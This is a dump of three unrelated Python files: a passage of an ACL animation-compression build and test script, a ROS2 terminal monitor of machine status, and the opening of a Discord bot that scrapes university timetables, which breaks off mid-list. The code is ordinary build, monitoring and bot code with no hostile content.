if not platform.system() == 'Darwin' and not platform.system() == 'Linux':
print('Emscripten is only supported on OS X and Linux')
sys.exit(1)
if args.use_avx:
print('AVX is not supported with Emscripten')
sys.exit(1)
if not args.cpu in ['wasm']:
print('{} cpu architecture not in supported list [wasm] for Emscripten'.format(args.cpu))
sys.exit(1)
else:
if not args.cpu:
args.cpu = 'x64'
if args.cpu == 'arm64':
if not args.compiler in ['vs2017', 'vs2019', 'ios', 'android']:
print('arm64 is only supported with VS2017, VS2019, Android, and iOS')
sys.exit(1)
elif args.cpu == 'armv7':
if not args.compiler == 'android':
print('armv7 is only supported with Android')
sys.exit(1)
elif args.cpu == 'wasm':
if not args.compiler == 'emscripten':
print('wasm is only supported with Emscripten')
sys.exit(1)
if platform.system() == 'Darwin' and args.cpu == 'x86':
result = subprocess.check_output(['xcodebuild', '-version']).decode("utf-8")
if 'Xcode 11' in result:
print('Versions of Xcode 11 and up no longer support x86')
sys.exit(1)
return args
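# Example invocation (illustrative only; every flag below is defined in the
# parser above):
#   python make.py -build -unit_test -compiler clang10 -config Release -cpu x64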
def get_generator(compiler, cpu):
if compiler is None:
return None
if platform.system() == 'Windows':
if compiler == 'vs2015':
if cpu == 'x86':
return 'Visual Studio 14'
elif cpu == 'x64':
return 'Visual Studio 14 Win64'
elif compiler == 'vs2017':
if cpu == 'x86':
return 'Visual Studio 15'
elif cpu == 'x64':
return 'Visual Studio 15 Win64'
elif cpu == 'arm64':
# VS2017 ARM/ARM64 support only works with cmake 3.13 and up and the architecture must be specified with
# the -A cmake switch
return 'Visual Studio 15 2017'
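# Illustrative command under that assumption (cmake 3.13+):
#   cmake .. -G "Visual Studio 15 2017" -A ARM64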
elif compiler == 'vs2019' or compiler == 'vs2019-clang':
return 'Visual Studio 16 2019'
elif compiler == 'android':
# For Android, we use the default generator since we don't build with CMake
return None
elif platform.system() == 'Darwin':
if compiler == 'osx' or compiler == 'ios':
return 'Xcode'
elif compiler == 'emscripten':
# Emscripten uses the default generator
return None
elif platform.system() == 'Linux':
if compiler == 'emscripten':
# Emscripten uses the default generator
return None
return 'Unix Makefiles'
print('Unknown compiler: {}'.format(compiler))
print('See help with: python make.py -help')
sys.exit(1)
def get_architecture(compiler, cpu):
if compiler is None:
return None
if platform.system() == 'Windows':
if compiler == 'vs2017':
if cpu == 'arm64':
return 'ARM64'
elif compiler == 'vs2019' or compiler == 'vs2019-clang':
if cpu == 'x86':
return 'Win32'
else:
return cpu
# This compiler/cpu pair does not need the architecture switch
return None
def get_toolchain(compiler, cmake_script_dir):
if platform.system() == 'Windows' and compiler == 'android':
return os.path.join(cmake_script_dir, 'Toolchain-Android.cmake')
elif platform.system() == 'Darwin' and compiler == 'ios':
return os.path.join(cmake_script_dir, 'Toolchain-iOS.cmake')
# No toolchain
return None
def set_compiler_env(compiler, args):
if platform.system() == 'Linux':
os.environ['MAKEFLAGS'] = '-j{}'.format(args.num_threads)
if compiler == 'clang4':
os.environ['CC'] = 'clang-4.0'
os.environ['CXX'] = 'clang++-4.0'
elif compiler == 'clang5':
os.environ['CC'] = 'clang-5.0'
os.environ['CXX'] = 'clang++-5.0'
elif compiler == 'clang6':
os.environ['CC'] = 'clang-6.0'
os.environ['CXX'] = 'clang++-6.0'
elif compiler == 'clang7':
os.environ['CC'] = 'clang-7'
os.environ['CXX'] = 'clang++-7'
elif compiler == 'clang8':
os.environ['CC'] = 'clang-8'
os.environ['CXX'] = 'clang++-8'
elif compiler == 'clang9':
os.environ['CC'] = 'clang-9'
os.environ['CXX'] = 'clang++-9'
elif compiler == 'clang10':
os.environ['CC'] = 'clang-10'
os.environ['CXX'] = 'clang++-10'
elif compiler == 'clang11':
os.environ['CC'] = 'clang-11'
os.environ['CXX'] = 'clang++-11'
elif compiler == 'gcc5':
os.environ['CC'] = 'gcc-5'
os.environ['CXX'] = 'g++-5'
elif compiler == 'gcc6':
os.environ['CC'] = 'gcc-6'
os.environ['CXX'] = 'g++-6'
elif compiler == 'gcc7':
os.environ['CC'] = 'gcc-7'
os.environ['CXX'] = 'g++-7'
elif compiler == 'gcc8':
os.environ['CC'] = 'gcc-8'
os.environ['CXX'] = 'g++-8'
elif compiler == 'gcc9':
os.environ['CC'] = 'gcc-9'
os.environ['CXX'] = 'g++-9'
elif compiler == 'gcc10':
os.environ['CC'] = 'gcc-10'
os.environ['CXX'] = 'g++-10'
elif compiler == 'emscripten':
# Nothing to do for Emscripten
return
else:
print('Unknown compiler: {}'.format(compiler))
print('See help with: python make.py -help')
sys.exit(1)
def do_generate_solution(build_dir, cmake_script_dir, test_data_dir, decomp_data_dir, args):
compiler = args.compiler
cpu = args.cpu
config = args.config
if compiler:
set_compiler_env(compiler, args)
extra_switches = ['--no-warn-unused-cli']
extra_switches.append('-DCPU_INSTRUCTION_SET:STRING={}'.format(cpu))
if args.use_avx:
print('Enabling AVX usage')
extra_switches.append('-DUSE_AVX_INSTRUCTIONS:BOOL=true')
if args.use_popcnt:
print('Enabling POPCOUNT usage')
extra_switches.append('-DUSE_POPCNT_INSTRUCTIONS:BOOL=true')
if not args.use_simd:
print('Disabling SIMD instruction usage')
extra_switches.append('-DUSE_SIMD_INSTRUCTIONS:BOOL=false')
if not args.use_sjson:
print('Disabling SJSON support')
extra_switches.append('-DUSE_SJSON:BOOL=false')
if args.bench:
extra_switches.append('-DBUILD_BENCHMARK_EXE:BOOL=true')
if not platform.system() == 'Windows':
extra_switches.append('-DCMAKE_BUILD_TYPE={}'.format(config.upper()))
toolchain = get_toolchain(compiler, cmake_script_dir)
if toolchain:
extra_switches.append('-DCMAKE_TOOLCHAIN_FILE={}'.format(toolchain))
if test_data_dir:
extra_switches.append('-DTEST_DATA_DIR:STRING="{}"'.format(test_data_dir))
if decomp_data_dir:
extra_switches.append('-DDECOMP_DATA_DIR:STRING="{}"'.format(decomp_data_dir))
# Generate IDE solution
print('Generating build files ...')
if compiler == 'emscripten':
cmake_cmd = 'emcmake cmake .. -DCMAKE_INSTALL_PREFIX="{}" {}'.format(build_dir, ' '.join(extra_switches))
else:
cmake_generator = get_generator(compiler, cpu)
if not cmake_generator:
print('Using default generator')
else:
generator_suffix = ''
if compiler == 'vs2019-clang':
extra_switches.append('-T ClangCL')
generator_suffix = 'Clang CL'
print('Using generator: {} {}'.format(cmake_generator, generator_suffix))
extra_switches.append('-G "{}"'.format(cmake_generator))
cmake_arch = get_architecture(compiler, cpu)
if cmake_arch:
print('Using architecture: {}'.format(cmake_arch))
extra_switches.append('-A {}'.format(cmake_arch))
cmake_cmd = 'cmake .. -DCMAKE_INSTALL_PREFIX="{}" {}'.format(build_dir, ' '.join(extra_switches))
result = subprocess.call(cmake_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_build(args):
config = args.config
print('Building ...')
cmake_cmd = 'cmake --build .'
if platform.system() == 'Windows':
if args.compiler == 'android':
cmake_cmd += ' --config {}'.format(config)
else:
cmake_cmd += ' --config {} --target INSTALL'.format(config)
elif platform.system() == 'Darwin':
if args.compiler == 'ios':
cmake_cmd += ' --config {}'.format(config)
else:
cmake_cmd += ' --config {} --target install'.format(config)
else:
cmake_cmd += ' --target install'
result = subprocess.call(cmake_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_convert(test_data_dir, args):
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run conversion')
sys.exit(1)
if not os.path.exists(args.convert):
print('Input/Output conversion directory not found: {}'.format(args.convert))
sys.exit(1)
# Validate that our regression testing tool is present
if args.compiler == 'emscripten':
compressor_exe_path = './bin/acl_compressor.js'
elif platform.system() == 'Windows':
compressor_exe_path = './bin/acl_compressor.exe'
else:
compressor_exe_path = './bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
# Grab all the test clips
conversion_clips = []
for (dirpath, dirnames, filenames) in os.walk(args.convert):
for filename in filenames:
if not filename.endswith('.acl.sjson'):
continue
clip_filename = os.path.join(dirpath, filename)
conversion_clips.append(clip_filename)
# Grab the raw config
config_dir = os.path.join(test_data_dir, 'configs')
config_filename = os.path.join(config_dir, 'uniformly_sampled_raw.config.sjson')
print('Converting SJSON clips in {} ...'.format(args.convert))
conversion_failed = False
for clip_filename in conversion_clips:
output_filename = clip_filename.replace('.acl.sjson', '.acl')
if args.compiler == 'emscripten':
cmd = 'node "{}" -acl="{}" -config="{}" -out="{}"'.format(compressor_exe_path, clip_filename, config_filename, output_filename)
else:
cmd = '"{}" -acl="{}" -config="{}" -out="{}"'.format(compressor_exe_path, clip_filename, config_filename, output_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
result = subprocess.call(cmd, shell=True)
if result != 0:
print('Failed to run conversion for clip: {}'.format(clip_filename))
print(cmd)
conversion_failed = True
print('Done!')
if conversion_failed:
sys.exit(1)
def do_tests_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tests', 'main_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.unit_tests/com.acl.unit_tests.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_tests_cmake(args):
ctest_cmd = 'ctest --output-on-failure --parallel {}'.format(args.num_threads)
if platform.system() == 'Windows' or platform.system() == 'Darwin':
ctest_cmd += ' -C {}'.format(args.config)
if args.tests_matching:
ctest_cmd += ' --tests-regex {}'.format(args.tests_matching)
result = subprocess.call(ctest_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_tests(build_dir, args):
print('Running unit tests ...')
if args.compiler == 'android':
do_tests_android(build_dir, args)
else:
do_tests_cmake(args)
def format_elapsed_time(elapsed_time):
hours, rem = divmod(elapsed_time, 3600)
minutes, seconds = divmod(rem, 60)
return '{:0>2}h {:0>2}m {:05.2f}s'.format(int(hours), int(minutes), seconds)
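# Worked example: format_elapsed_time(3725.5) -> '01h 02m 05.50s'
# (3725.5 s splits into 1 h, 2 min and 5.50 s under the divmod calls above).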
def print_progress(iteration, total, prefix='', suffix='', decimals=1, bar_length=40):
# Taken from https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
# With minor tweaks
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
bar_length - Optional : character length of bar (Int)
"""
str_format = "{0:." + str(decimals) + "f}"
percents = str_format.format(100 * (iteration / float(total)))
filled_length = int(round(bar_length * iteration / float(total)))
bar = '█' * filled_length + '-' * (bar_length - filled_length)
# We need to clear any previous line we might have to ensure we have no visual artifacts
# Note that if this function is called too quickly, the text might flicker
terminal_width = 80
sys.stdout.write('{}\r'.format(' ' * terminal_width))
sys.stdout.flush()
sys.stdout.write('%s |%s| %s%s %s\r' % (prefix, bar, percents, '%', suffix))
sys.stdout.flush()
if iteration == total:
sys.stdout.write('\n')
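# Minimal usage sketch, mirroring how the regression runner below calls it:
#   for i in range(total + 1):
#       print_progress(i, total, 'Testing clips:', '{} / {}'.format(i, total))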
def do_prepare_regression_test_data(test_data_dir, args):
print('Preparing regression test data ...')
current_test_data_zip = os.path.join(test_data_dir, '{}.zip'.format(current_test_data))
# Validate that our regression test data is present
if not os.path.exists(current_test_data_zip):
print('Regression test data not found: {}'.format(current_test_data_zip))
return
# If it hasn't been decompressed yet, do so now
current_test_data_dir = os.path.join(test_data_dir, current_test_data)
needs_decompression = not os.path.exists(current_test_data_dir)
if needs_decompression:
print('Decompressing {} ...'.format(current_test_data_zip))
with zipfile.ZipFile(current_test_data_zip, 'r') as zip_ref:
zip_ref.extractall(test_data_dir)
# Grab all the test clips
regression_clips = []
for (dirpath, dirnames, filenames) in os.walk(current_test_data_dir):
for filename in filenames:
if not filename.endswith('.acl'):
continue
clip_filename = os.path.join(dirpath, filename)
regression_clips.append((clip_filename, os.path.getsize(clip_filename)))
if len(regression_clips) == 0:
print('No regression clips found')
sys.exit(1)
print('Found {} regression clips'.format(len(regression_clips)))
# Grab all the test configurations
test_configs = []
test_config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(test_config_dir):
for (dirpath, dirnames, filenames) in os.walk(test_config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
config_filename = os.path.join(dirpath, filename)
test_configs.append((config_filename, filename))
if len(test_configs) == 0:
print('No regression configurations found')
sys.exit(1)
print('Found {} regression configurations'.format(len(test_configs)))
# Sort the configs by name for consistency
test_configs.sort(key=lambda entry: entry[1])
# Sort clips by size to test larger clips first, it parallelizes better
regression_clips.sort(key=lambda entry: entry[1], reverse=True)
# Write our metadata file
with open(os.path.join(current_test_data_dir, 'metadata.sjson'), 'w') as metadata_file:
print('configs = [', file = metadata_file)
for config_filename, _ in test_configs:
print('\t"{}"'.format(os.path.relpath(config_filename, test_config_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
print('clips = [', file = metadata_file)
for clip_filename, _ in regression_clips:
print('\t"{}"'.format(os.path.relpath(clip_filename, current_test_data_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
return current_test_data_dir
def do_prepare_decompression_test_data(test_data_dir, args):
print('Preparing decompression test data ...')
current_data_zip = os.path.join(test_data_dir, '{}.zip'.format(current_decomp_data))
# Validate that our regression test data is present
if not os.path.exists(current_data_zip):
print('Decompression test data not found: {}'.format(current_data_zip))
return
# If it hasn't been decompressed yet, do so now
current_data_dir = os.path.join(test_data_dir, current_decomp_data)
needs_decompression = not os.path.exists(current_data_dir)
if needs_decompression:
print('Decompressing {} ...'.format(current_data_zip))
with zipfile.ZipFile(current_data_zip, 'r') as zip_ref:
zip_ref.extractall(test_data_dir)
# Grab all the test clips
clips = []
for (dirpath, dirnames, filenames) in os.walk(current_data_dir):
for filename in filenames:
if not filename.endswith('.acl'):
continue
clip_filename = os.path.join(dirpath, filename)
clips.append(clip_filename)
if len(clips) == 0:
print('No decompression clips found')
return
print('Found {} decompression clips'.format(len(clips)))
# Write our metadata file
with open(os.path.join(current_data_dir, 'metadata.sjson'), 'w') as metadata_file:
print('clip_dir = "{}"'.format(current_data_dir), file = metadata_file)
print('', file = metadata_file)
print('clips = [', file = metadata_file)
for clip_filename in clips:
print('\t"{}"'.format(os.path.relpath(clip_filename, current_data_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
return current_data_dir
def do_regression_tests_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tools', 'regression_tester_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.regression_tests/com.acl.regression_tests.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_regression_tests_cmake(test_data_dir, args):
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run regression tests')
sys.exit(1)
import queue
# Validate that our regression testing tool is present
if args.compiler == 'emscripten':
compressor_exe_path = './bin/acl_compressor.js'
elif platform.system() == 'Windows':
compressor_exe_path = './bin/acl_compressor.exe'
else:
compressor_exe_path = './bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
# Grab all the test clips
regression_clips = []
current_test_data_dir = os.path.join(test_data_dir, current_test_data)
for (dirpath, dirnames, filenames) in os.walk(current_test_data_dir):
for filename in filenames:
if not filename.endswith('.acl'):
continue
clip_filename = os.path.join(dirpath, filename)
regression_clips.append((clip_filename, os.path.getsize(clip_filename)))
# Grab all the test configurations
test_configs = []
test_config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(test_config_dir):
for (dirpath, dirnames, filenames) in os.walk(test_config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
config_filename = os.path.join(dirpath, filename)
test_configs.append((config_filename, filename))
# Sort the configs by name for consistency
test_configs.sort(key=lambda entry: entry[1])
# Sort clips by size to test larger clips first, it parallelizes better
regression_clips.sort(key=lambda entry: entry[1], reverse=True)
# Iterate over every clip and configuration and perform the regression testing
for config_filename, _ in test_configs:
print('Performing regression tests for configuration: {}'.format(os.path.basename(config_filename)))
regression_start_time = time.perf_counter()
cmd_queue = queue.Queue()
completed_queue = queue.Queue()
failed_queue = queue.Queue()
failure_lock = threading.Lock()
for clip_filename, _ in regression_clips:
if args.compiler == 'emscripten':
cmd = 'node "{}" -acl="{}" -test -config="{}"'.format(compressor_exe_path, clip_filename, config_filename)
else:
cmd = '"{}" -acl="{}" -test -config="{}"'.format(compressor_exe_path, clip_filename, config_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
cmd_queue.put((clip_filename, cmd))
# Add a marker to terminate the threads
for i in range(args.num_threads):
cmd_queue.put(None)
def run_clip_regression_test(cmd_queue, completed_queue, failed_queue, failure_lock):
while True:
entry = cmd_queue.get()
if entry is None:
return
(clip_filename, cmd) = entry
result = subprocess.call(cmd, shell=True)
if result != 0:
failed_queue.put((clip_filename, cmd))
failure_lock.acquire()
print('Failed to run regression test for clip: {}'.format(clip_filename))
print(cmd)
failure_lock.release()
completed_queue.put(clip_filename)
threads = [ threading.Thread(target = run_clip_regression_test, args = (cmd_queue, completed_queue, failed_queue, failure_lock)) for _i in range(args.num_threads) ]
for thread in threads:
thread.daemon = True
thread.start()
print_progress(0, len(regression_clips), 'Testing clips:', '{} / {}'.format(0, len(regression_clips)))
try:
while True:
for thread in threads:
thread.join(1.0)
num_processed = completed_queue.qsize()
print_progress(num_processed, len(regression_clips), 'Testing clips:', '{} / {}'.format(num_processed, len(regression_clips)))
all_threads_done = True
for thread in threads:
if thread.is_alive():
all_threads_done = False
if all_threads_done:
break
except KeyboardInterrupt:
sys.exit(1)
regression_testing_failed = not failed_queue.empty()
regression_end_time = time.perf_counter()
print('Done in {}'.format(format_elapsed_time(regression_end_time - regression_start_time)))
if regression_testing_failed:
sys.exit(1)
def do_regression_tests(build_dir, test_data_dir, args):
print('Running regression tests ...')
if args.compiler == 'android':
do_regression_tests_android(build_dir, args)
else:
do_regression_tests_cmake(test_data_dir, args)
def do_run_bench_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tools', 'acl_decompressor', 'main_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.decompressor/com.acl.decompressor.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_pull_bench_android(build_dir):
# Grab the android directory we wrote the results to
output = str(subprocess.check_output('adb logcat -s acl -e "Benchmark results will be written to:" -m 1 -d'))
matches = re.search(r'Benchmark results will be written to: ([/\.\w]+)', output)
if matches is None:
print('Failed to find Android source directory from ADB')
android_src_dir = '/storage/emulated/0/Android/data/com.acl.decompressor/files'
print('{} will be used instead'.format(android_src_dir))
else:
android_src_dir = matches.group(1)
# Grab the benchmark results from the android device
dst_filename = os.path.join(build_dir, 'benchmark_results.json')
src_filename = '{}/benchmark_results.json'.format(android_src_dir)
cmd = 'adb pull "{}" "{}"'.format(src_filename, dst_filename)
os.system(cmd)
def do_run_bench_native(build_dir, test_data_dir):
if platform.system() == 'Windows':
bench_exe = os.path.join(os.getcwd(), 'bin/acl_decompressor.exe')
else:
bench_exe = os.path.join(os.getcwd(), 'bin/acl_decompressor')
current_data_dir = os.path.join(test_data_dir, current_decomp_data)
metadata_filename = os.path.join(current_data_dir, 'metadata.sjson')
benchmark_output_filename = os.path.join(build_dir, 'benchmark_results.json')
bench_cmd = '{} -metadata="{}" --benchmark_out={} --benchmark_out_format=json'.format(bench_exe, metadata_filename, benchmark_output_filename)
result = subprocess.call(bench_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_run_bench(build_dir, test_data_dir, args):
if args.compiler == 'ios':
return # Not supported on iOS
print('Running benchmark ...')
if args.compiler == 'android':
do_run_bench_android(build_dir, args)
else:
do_run_bench_native(build_dir, test_data_dir)
if __name__ == "__main__":
args = parse_argv()
build_dir = os.path.join(os.getcwd(), 'build')
test_data_dir = os.path.join(os.getcwd(), 'test_data')
cmake_script_dir = os.path.join(os.getcwd(), 'cmake')
is_clean_requested = args.clean or args.clean_only
if is_clean_requested and os.path.exists(build_dir):
print('Cleaning previous build ...')
shutil.rmtree(build_dir)
if args.clean_only:
sys.exit(0)
if not os.path.exists(build_dir):
os.makedirs(build_dir)
os.chdir(build_dir)
print('Using config: {}'.format(args.config))
print('Using cpu: {}'.format(args.cpu))
if args.compiler:
print('Using compiler: {}'.format(args.compiler))
print('Using {} threads'.format(args.num_threads))
regression_data_dir = do_prepare_regression_test_data(test_data_dir, args)
decomp_data_dir = do_prepare_decompression_test_data(test_data_dir, args)
do_generate_solution(build_dir, cmake_script_dir, regression_data_dir, decomp_data_dir, args)
if args.build:
do_build(args)
if args.convert:
do_convert(test_data_dir, args)
if args.unit_test:
do_tests(build_dir, args)
if args.regression_test and not args.compiler == 'ios':
do_regression_tests(build_dir, test_data_dir, args)
if args.run_bench:
do_run_bench(build_dir, test_data_dir, args)
if args.pull_bench:
do_pull_bench_android(build_dir)
sys.exit(0)
|
rclshark_smi.py | #!/bin/python3
import subprocess
import os
import re
import threading
import sys
import select
import datetime
import rclpy
from rclpy.node import Node
from computer_msgs.msg import PcStatus
from computer_msgs.srv import PcStatusSrv
version_major = 1
version_minor = 0
version_revision = 1
version_build = str(version_major) + "." + str(version_minor) + "." + str(version_revision)
# ==========================================================
# Call one service
class using_srv(Node):
def __init__(self, _ip:str):
self.ip = _ip
super().__init__('get'+self.ip)
self.sub_pc_0 = 'ip_'+self.ip+'_endcb'
def __del__(self):
self.destroy_node()
self.get_status.destroy()
del self.req
def reset_client(self) -> bool:
# Returns True when the target service is unavailable so callers can bail out.
self.get_status = self.create_client(PcStatusSrv, '/'+self.sub_pc_0)
if not self.get_status.service_is_ready():
# self.get_logger().info('service not available')
return True
self.req = PcStatusSrv.Request()
return False
def get_by_service(self):
self.req.system_ctrl = 0
self.future = self.get_status.call_async(self.req)
class srv_main:
def __init__(self, _ip:str):
self.ip = _ip
self.ros_class = using_srv(self.ip)
def __del__(self):
self.ros_class.destroy_node()
def using_srv_fnc(self):
if(self.ros_class.reset_client()):
return -1
self.req = self.ros_class.get_by_service()
if rclpy.ok():
rclpy.spin_once(self.ros_class)
if self.ros_class.future.done():
try:
rclpy.spin_once(self.ros_class)
except Exception:
return -1
return self.ros_class.future.result().callback_status
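# Usage sketch (hypothetical address; node names are assumed to encode IPs with
# underscores, matching the '/ip_<addr>_endcb' services discovered below):
#   status = srv_main('192_168_1_10').using_srv_fnc()  # -1 when unreachable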
# ==========================================================
srv_class_list = list()
ip_list = list()
def show_header():
print("+----------------------------------------------------------------------------+")
print("| RCLSHARK-SMI " + version_build + "\t" + "ROS-DISTRO " + os.environ['ROS_DISTRO'] + "\t\t" + datetime.datetime.now().isoformat(timespec='seconds') + "\t |")
print("|============================================================================|")
print("| username\t\tip_address\tcpu(%)\ttmp(*C)\tmem(%)\t\t |")
print("|============================================================================|")
def show_footer():
print("|============================================================================|")
print("| Press 'q'-> Enter Key to quit |")
print("+----------------------------------------------------------------------------+")
def get_data_list() -> list:
global srv_class_list
global ip_list
ip_list = get_ip_list()
# Rebuild the service-client list whenever new nodes have appeared
if(len(ip_list) > len(srv_class_list)):
srv_class_list.clear()
for i in ip_list:
srv_class_list.append(srv_main(i))
ip_list, data = get_from_srv(srv_class_list, ip_list)
return data
def show_data():
terminal_col = 5
for i in range(3):
input_data = get_data_list()
try:
for data in input_data:
ip_data = int(data.ip_address.split(".")[3])
data.local_tag = ip_data
for data in sorted(input_data, reverse=False, key=lambda x: x.local_tag):
print_status = "| "+ data.user_name + "\t\t" + data.ip_address + "\t" + str(data.cpu_percent).rjust(5) + "\t" + str(data.core_temp).rjust(5) + "\t" + str(data.mem_percent).rjust(5) + "\t\t" + " |"
print(print_status)
terminal_col = terminal_col + 1
for i in range(20 - terminal_col):
print("|\t\t\t\t\t\t\t\t\t |")
except Exception:
pass  # skip this refresh pass if a row is malformed or data is missing
def get_from_srv(_srv_list:list, _ip_list:list):
# get data from srv_list
data_received = list()
for i in range(len(_srv_list)):
try:
out = _srv_list[i].using_srv_fnc()
if(out == -1):
_ip_list.remove(_srv_list[i].ip)
continue  # skip unreachable nodes rather than appending the error code
data_received.append(out)
except Exception:
pass  # ignore clients whose service call raised
return _ip_list, data_received
def get_ip_list() -> list:
try:
return re.findall("/ip_(.*)_end", str(subprocess.run(["ros2" , "node" , "list"], capture_output=True).stdout))[0].split("_end\\n/ip_")
except Exception:  # no matching nodes, or the ros2 CLI is unavailable
return []
def loop():
show_header()
show_data()
show_footer()
def input_timeout(timeout=10):
(ready, _, _) = select.select([sys.stdin], [], [], timeout)
if ready:
return sys.stdin.readline().rstrip('\n')
else:
return ''
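# Usage sketch, matching the commented-out main loop further down:
#   if input_timeout(0.1) == 'q':
#       exit(0)  # quit once the user types 'q' and presses Enter in time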
def ros_main(args = None):
global ip_list
global srv_class_list
rclpy.init(args=args)
t = threading.Thread(target=loop, args=())
t.daemon = True
t.start()
t.join()
del t
# while rclpy.ok():
# t = threading.Thread(target=loop,args=())
# t.setDaemon(True)
# t.start()
# t.join(timeout=5.0)
# if t.is_alive():
# print("Timeout Error")
# exit(1)
# if input_timeout(0.1) == 'q':
# print("quit")
# srv_class_list.clear()
# exit(0)
# del t
rclpy.shutdown()
if __name__=='__main__':
ros_main() |
kurisu.py | #!/usr/bin/env python3.8
import asyncio
import discord
import environs
import googletrans
import gtts
import json
import os
import pykakasi
import random
import requests
import schedule
import threading
import time
from datetime import datetime, timedelta
def are_same_day(date1, date2):
return (date1.replace(hour=0, minute=0, second=0, microsecond=0) - date2.replace(hour=0, minute=0, second=0, microsecond=0)).days == 0
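# Worked example: both timestamps fall on the same calendar day once truncated
# to midnight, so this returns True:
#   are_same_day(datetime(2021, 5, 1, 23, 59), datetime(2021, 5, 1, 0, 1))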
def delete_if_exists(filename):
try:
os.unlink(filename)
except FileNotFoundError:
pass
def translate_italian_to_japanese(text):
translator = googletrans.Translator()
return translator.translate(text, src='it', dest='ja').text
def japanese_to_romaji(text):
kakasi = pykakasi.kakasi()
kakasi.setMode('H', 'a')
kakasi.setMode('K', 'a')
kakasi.setMode('J', 'a')
kakasi.setMode('s', True)
conv = kakasi.getConverter()
return conv.do(text)
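# Usage sketch (assumes the legacy pykakasi setMode/getConverter API used
# above; output spelling depends on the pykakasi version):
#   japanese_to_romaji('こんにちは')  # -> roughly 'konnichiha'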
def create_voice(text, outfile, lang='ja'):
tts = gtts.gTTS(text=text, lang=lang)
tts.save(outfile)
class Scraper(object):
def __init__(self, url):
self.url = url
self.dateformat = '%Y-%m-%dT%H:%M:%S'
def scrape(self):
res = requests.get(self.url)
data = json.loads(res.text)
now = datetime.now()
return list(filter(lambda e: e['start'] > now, (map(lambda event: {
'module_code': event['cod_modulo'],
'start': datetime.strptime(event['start'], self.dateformat),
'end': datetime.strptime(event['end'], self.dateformat),
'title': event['title'],
'teams_link': event['teams'],
'note': event['note'],
'prof': event['docente'],
'time': event['time']
}, data))))
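# Usage sketch: scrape() yields upcoming events as dicts with datetime
# 'start'/'end' keys (URL taken from the KurisuBot scrapers below):
#   events = Scraper('https://corsi.unibo.it/laurea/fisica/orario-lezioni/@@orario_reale_json?anno=1&curricula=').scrape()
#   if events: print(events[0]['title'], events[0]['start'])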
class KurisuBot(discord.Client):
def __init__(self, notify_channel, offset):
super(KurisuBot, self).__init__()
self.voice_client = None
self.hour_offset = offset
self.notify_channel = notify_channel
self.scrapers = [Scraper('https://corsi.unibo.it/laurea/fisica/orario-lezioni/@@orario_reale_json?anno=1&curricula='),
Scraper('https://corsi.unibo.it/laurea/fisica/orario-lezioni/@@orario_reale_json?anno=2&curricula='),
Scraper('https://corsi.unibo.it/laurea/fisica/orario-lezioni/@@orario_reale_json?anno=3&curricula=')]
self.stop_event = threading.Event()
self.quotes = [
'I don\'t want to deny who I\'ve been. Because even my failures are a part of who I am today',
'Something must be wrong for you to use my actual name',
'Say it right, Hououin Pervert-Kyouma!',
'People\'s feelings are memories that transcend time',
'Who\'ll eat a pervert\'s banana anyway?',
'It looks like you\'re both perverts',
